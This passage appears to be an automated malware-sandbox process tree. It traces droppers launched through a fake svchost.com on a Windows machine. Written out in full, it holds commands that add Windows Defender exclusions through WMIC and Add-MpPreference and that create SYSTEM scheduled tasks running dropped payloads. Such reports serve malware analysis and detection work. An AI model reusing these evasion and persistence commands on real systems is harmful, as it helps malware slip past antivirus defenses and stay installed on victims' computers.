        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\T70XJD~1.EXE"
        7⤵
        
        PID:884
        
        C:\Users\Admin\Pictures\T70XJD~1.EXE
        
        C:\Users\Admin\Pictures\T70XJD~1.EXE
        8⤵
        
        PID:6404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:6376
        
        C:\Users\Admin\Pictures\T70XJD~1.EXE
        
        "C:\Users\Admin\Pictures\T70XJD~1.EXE"
        9⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        
        PID:3696
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\IU2RXT~1.EXE"
        7⤵
        
        PID:1948
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\VPQA8F~1.EXE"
        7⤵
        
        PID:5932
        
        C:\Users\Admin\Pictures\VPQA8F~1.EXE
        
        C:\Users\Admin\Pictures\VPQA8F~1.EXE
        8⤵
        
        PID:7536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:5892
        
        C:\Users\Admin\Pictures\VPQA8F~1.EXE
        
        "C:\Users\Admin\Pictures\VPQA8F~1.EXE"
        9⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        
        PID:2520
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\SXDVZ5~1.EXE"
        7⤵
        
        PID:3440
        
        C:\Users\Admin\Pictures\SXDVZ5~1.EXE
        
        C:\Users\Admin\Pictures\SXDVZ5~1.EXE
        8⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Local\Temp\7zS6A7F.tmp\Install.exe
        
        .\Install.exe /hTsdidwmLR "385118" /S
        9⤵
        
        PID:6872
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        
        PID:6648
        
        C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m where.exe /c cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 17:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\sSKDjtw.exe\" my /JMsite_idIRv 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:4280
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\C3E1PZ~1.EXE"
        7⤵
        
        PID:2996
        
        C:\Users\Admin\Pictures\C3E1PZ~1.EXE
        
        C:\Users\Admin\Pictures\C3E1PZ~1.EXE
        8⤵
        
        PID:7808
        
        C:\Users\Admin\AppData\Local\Temp\7zS7E84.tmp\Install.exe
        
        .\Install.exe /hTsdidwmLR "385118" /S
        9⤵
        
        PID:6244
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        
        PID:7608
        
        C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m where.exe /c cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 17:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\EwRHKNu.exe\" my /hqsite_idSkH 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:1520
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\PQAU4D~1.EXE" --silent --allusers=0
        7⤵
        
        PID:3680
        
        C:\Users\Admin\Pictures\PQAU4D~1.EXE
        
        C:\Users\Admin\Pictures\PQAU4D~1.EXE --silent --allusers=0
        8⤵
        
        PID:6996
        
        C:\Users\Admin\Pictures\PQAU4D~1.EXE
        
        C:\Users\Admin\Pictures\PQAU4D~1.EXE --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6307e1d0,0x6307e1dc,0x6307e1e8
        9⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PQAU4D~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PQAU4D~1.EXE" --version
        9⤵
        
        PID:4980
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\Q1GJ18~1.EXE"
        7⤵
        
        PID:5668
        
        C:\Users\Admin\Pictures\Q1GJ18~1.EXE
        
        C:\Users\Admin\Pictures\Q1GJ18~1.EXE
        8⤵
        
        PID:8104
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U6940~1.EXE"
        9⤵
        
        PID:6736
        
        C:\Users\Admin\AppData\Local\Temp\U6940~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U6940~1.EXE
        10⤵
        
        PID:5104
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U6941~1.EXE"
        9⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\U6941~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U6941~1.EXE
        10⤵
        
        PID:2644
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\JA93M8~1.EXE"
        7⤵
        
        PID:6084
        
        C:\Users\Admin\Pictures\JA93M8~1.EXE
        
        C:\Users\Admin\Pictures\JA93M8~1.EXE
        8⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\7zS4C58.tmp\Install.exe
        
        .\Install.exe /hTsdidwmLR "385118" /S
        9⤵
        
        PID:6184
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        
        PID:7488
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 18:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\rQDCYtk.exe\" my /Gksite_idSKO 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:4656
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\JTH9WB~1.EXE"
        7⤵
        
        PID:5700
        
        C:\Users\Admin\Pictures\JTH9WB~1.EXE
        
        C:\Users\Admin\Pictures\JTH9WB~1.EXE
        8⤵
        
        PID:7268
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\7AO4EM~1.EXE"
        7⤵
        
        PID:4756
        
        C:\Users\Admin\Pictures\7AO4EM~1.EXE
        
        C:\Users\Admin\Pictures\7AO4EM~1.EXE
        8⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 292
        9⤵
        Program crash
        
        PID:2728
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 292
        9⤵
        Program crash
        
        PID:2460
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\VZBLMV~1.EXE"
        7⤵
        
        PID:5396
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\Z3FLRW~1.EXE" --silent --allusers=0
        7⤵
        
        PID:1536
        
        C:\Users\Admin\Pictures\Z3FLRW~1.EXE
        
        C:\Users\Admin\Pictures\Z3FLRW~1.EXE --silent --allusers=0
        8⤵
        
        PID:8172
        
        C:\Users\Admin\Pictures\Z3FLRW~1.EXE
        
        C:\Users\Admin\Pictures\Z3FLRW~1.EXE --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6307e1d0,0x6307e1dc,0x6307e1e8
        9⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z3FLRW~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z3FLRW~1.EXE" --version
        9⤵
        
        PID:1164
        
        C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\installer.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\installer.exe" --version
        9⤵
        
        PID:1912
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\YQCD6G~1.EXE"
        7⤵
        
        PID:7876
        
        C:\Users\Admin\Pictures\YQCD6G~1.EXE
        
        C:\Users\Admin\Pictures\YQCD6G~1.EXE
        8⤵
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\7zS2E9F.tmp\Install.exe
        
        .\Install.exe /hTsdidwmLR "385118" /S
        9⤵
        
        PID:1496
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        
        PID:7172
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 18:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\VRjRFec.exe\" my /Oasite_idbvx 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:1480
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\BJ7XZ7~1.EXE"
        7⤵
        
        PID:2256
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\BEUAGA~1.EXE"
        7⤵
        
        PID:4920
        
        C:\Users\Admin\Pictures\BEUAGA~1.EXE
        
        C:\Users\Admin\Pictures\BEUAGA~1.EXE
        8⤵
        
        PID:4836
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3QC0~1.EXE"
        9⤵
        
        PID:6296
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3QC1~1.EXE"
        9⤵
        
        PID:3148
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\3JPEZL~1.EXE"
        7⤵
        
        PID:6336
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ALRALT~1.EXE" --silent --allusers=0
        7⤵
        
        PID:1096
        
        C:\Users\Admin\Pictures\ALRALT~1.EXE
        
        C:\Users\Admin\Pictures\ALRALT~1.EXE --silent --allusers=0
        8⤵
        
        PID:6752
        
        C:\Users\Admin\Pictures\ALRALT~1.EXE
        
        C:\Users\Admin\Pictures\ALRALT~1.EXE --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6223e1d0,0x6223e1dc,0x6223e1e8
        9⤵
        
        PID:4892
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ALRALT~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ALRALT~1.EXE" --version
        9⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\installer.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.38\installer.exe" --version
        9⤵
        
        PID:5060
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\HMVPGV~1.EXE"
        7⤵
        
        PID:5360
        
        C:\Users\Admin\Pictures\HMVPGV~1.EXE
        
        C:\Users\Admin\Pictures\HMVPGV~1.EXE
        8⤵
        
        PID:3028
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\MVTHLO~1.EXE"
        7⤵
        
        PID:4112
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\AM6ULH~1.EXE"
        7⤵
        
        PID:1288
        
        C:\Users\Admin\Pictures\AM6ULH~1.EXE
        
        C:\Users\Admin\Pictures\AM6ULH~1.EXE
        8⤵
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\7zS6630.tmp\Install.exe
        
        .\Install.exe /qRBuldidlGuD "385118" /S
        9⤵
        
        PID:5096
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        
        PID:5512
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 18:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\LJvTFHj.exe\" my /oHsite_idnHj 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:5292
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe"
      4⤵
      PID:6780
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe
        5⤵
        
        PID:6836
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\23.exe"
      4⤵
      PID:5272
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\23.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\23.exe
        5⤵
        
        PID:6840
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE"
        6⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE
        
        C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE
        7⤵
        
        PID:7624
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE"
        8⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE
        
        C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE
        9⤵
        
        PID:7668
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE"
        10⤵
        
        PID:7524
        
        C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE
        
        C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE
        11⤵
        
        PID:3028
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE"
        12⤵
        
        PID:296
        
        C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE
        
        C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE
        13⤵
        
        PID:6664
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\TELEME~1\SVCSER~1.EXE"
        14⤵
        
        PID:7704
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6664 -s 1000
        14⤵
        Program crash
        
        PID:7504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3028 -s 1088
        12⤵
        Program crash
        
        PID:6396
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7668 -s 1224
        10⤵
        Program crash
        
        PID:4380
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 896
        8⤵
        Program crash
        
        PID:4652
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1124
        6⤵
        Program crash
        
        PID:8104
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\soft.exe"
      4⤵
      PID:4652
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\soft.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\soft.exe
        5⤵
        
        PID:5812
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\soft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\soft.exe"
        6⤵
        
        PID:6700
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SYSTEM~1.EXE"
      4⤵
      PID:3632
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SYSTEM~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SYSTEM~1.EXE
        5⤵
        
        PID:6824
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
        6⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:5064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
        7⤵
        
        PID:5740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
        7⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
        7⤵
        
        PID:4976
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\M5TRAI~1.EXE"
      4⤵
      PID:7140
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\M5TRAI~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\M5TRAI~1.EXE
        5⤵
        
        PID:1144
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        6⤵
        
        PID:7844
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\funta.exe"
      4⤵
      PID:6104
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\funta.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\funta.exe
        5⤵
        
        PID:4480
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 588
        6⤵
        Program crash
        
        PID:6664
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 580
        6⤵
        Program crash
        
        PID:2572
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MTKFAR~1.EXE"
      4⤵
      PID:7596
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MTKFAR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MTKFAR~1.EXE
        5⤵
        
        PID:7764
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\fud.exe"
      4⤵
      PID:6980
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\fud.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\fud.exe
        5⤵
        
        PID:5220
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 748
        6⤵
        Program crash
        
        PID:6060
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 804
        6⤵
        Program crash
        
        PID:7244
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 824
        6⤵
        Program crash
        
        PID:8124
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 840
        6⤵
        Program crash
        
        PID:2592
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 940
        6⤵
        Program crash
        
        PID:5432
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 980
        6⤵
        Program crash
        
        PID:7960
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1124
        6⤵
        Program crash
        
        PID:7472
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1172
        6⤵
        Program crash
        
        PID:5476
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1216
        6⤵
        Program crash
        
        PID:5540
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\154561~1\Dctooux.exe"
        6⤵
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\154561~1\Dctooux.exe
        
        C:\Users\Admin\AppData\Local\Temp\154561~1\Dctooux.exe
        7⤵
        
        PID:4576
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 484
        8⤵
        Program crash
        
        PID:3720
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1240
        6⤵
        Program crash
        
        PID:4400
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe"
      4⤵
      PID:7284
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe
        5⤵
        
        PID:5440
      - C:\Windows\svchost.exe
        
        "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe"
        6⤵
        
        PID:7908
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe"
        7⤵
        
        PID:8052
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        8⤵
        
        PID:7320
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        9⤵
        
        PID:3560
        
        C:\Windows\svchost.exe
        
        "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        10⤵
        
        PID:7524
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        11⤵
        
        PID:8144
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        12⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        13⤵
        
        PID:4628
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        14⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        15⤵
        
        PID:5496
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        16⤵
        
        PID:6596
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        17⤵
        
        PID:6252
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        18⤵
        
        PID:6172
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        19⤵
        
        PID:4704
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        20⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        21⤵
        
        PID:796
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        22⤵
        
        PID:7836
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        23⤵
        
        PID:6620
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        24⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        25⤵
        
        PID:7600
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        26⤵
        
        PID:7244
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        27⤵
        
        PID:1740
        
        C:\Windows\svchost.exe
        
        "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        28⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        29⤵
        
        PID:6728
        
        C:\Windows\svchost.com
        
